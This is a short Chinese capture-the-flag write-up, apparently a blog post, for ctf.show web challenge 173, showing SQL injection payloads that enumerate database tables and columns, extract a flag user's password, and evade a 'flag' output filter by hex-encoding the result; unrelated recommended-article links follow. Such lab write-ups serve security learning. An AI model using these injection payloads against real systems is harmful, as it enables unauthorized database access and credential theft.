ctf show web 入门173

1' union select 1,table_name,3 from information_schema.tables where table_schema=database()--+

1' union select 1,column_name,3 from information_schema.columns where table_name='ctfshow_user3'--+

这里跟上一题的不同之处在于:

1.原本只查询了 username, password 两个字段,现在变成了 id, username, password 三个字段

所以payload要改变为:-1' union select 1, 'hack', password from ctfshow_user3 where username='flag'--+

2.上一关只是检查 username 是不是 'flag'。而这一关,它把整个返回的数组 $ret 转换成了 JSON 字符串,然后用正则表达式模糊匹配只要任何一个角落包含 f-l-a-g 四个字母就不行 preg_match('/flag/i', ...) 检查

  • 这意味着: 只要最终返回给前端的整行数据里,包含"flag"这四个字母(不区分大小写),就会直接触发拦截,比如,假设密码中有flag也会把回显的内容过滤掉,此时我们使用HEX(password)把返回的密码编码从而绕过限制
相关推荐
2503_9317124810 分钟前
10m/s超高速电梯:西奥XO-NEWIII如何树立行业速度标杆
java·大数据·数据库
无小道13 分钟前
Redis——redis和mysql的数据同步
数据库·redis·mysql
AI的探索之旅18 分钟前
从 Ubuntu 14.04 到 24.04:TI AM335x 开发环境完整迁移与 Agent 接管方案
linux·数据库·嵌入式硬件·ubuntu·postgresql
MatrixOrigin26 分钟前
MatrixOne Git4Data 技术详解(七)·数据运维实践篇:Write-Audit-Publish——给 ETL 流水线装一道发布门禁
sql·数据平台·ai-native·矩阵起源·git4data·matrixone
辰合软件1 小时前
通达OA目录结构与核心文件解析
android·数据库·oracle
灵性(๑>ڡ<)☆1 小时前
Java学习笔记 --面向对象进阶
java·笔记·学习
名不经传的养虾人1 小时前
从0到1:企业级AI项目迭代日记 Vol.61|记忆不是越多越好,装一道门比装满更重要
数据库·人工智能·ai编程·ai工作流·企业ai
weigangwin1 小时前
DSPy 采用笔记:先证明 LLM 程序合同,再谈 Prompt 优化
笔记·prompt
智者知已应修善业1 小时前
【P12159蓝桥杯数组翻转】2025-4-24
c语言·c++·经验分享·笔记·算法·蓝桥杯
摇滚侠1 小时前
Apache Skywalking 实战 阅读笔记 第三章
笔记·apache·skywalking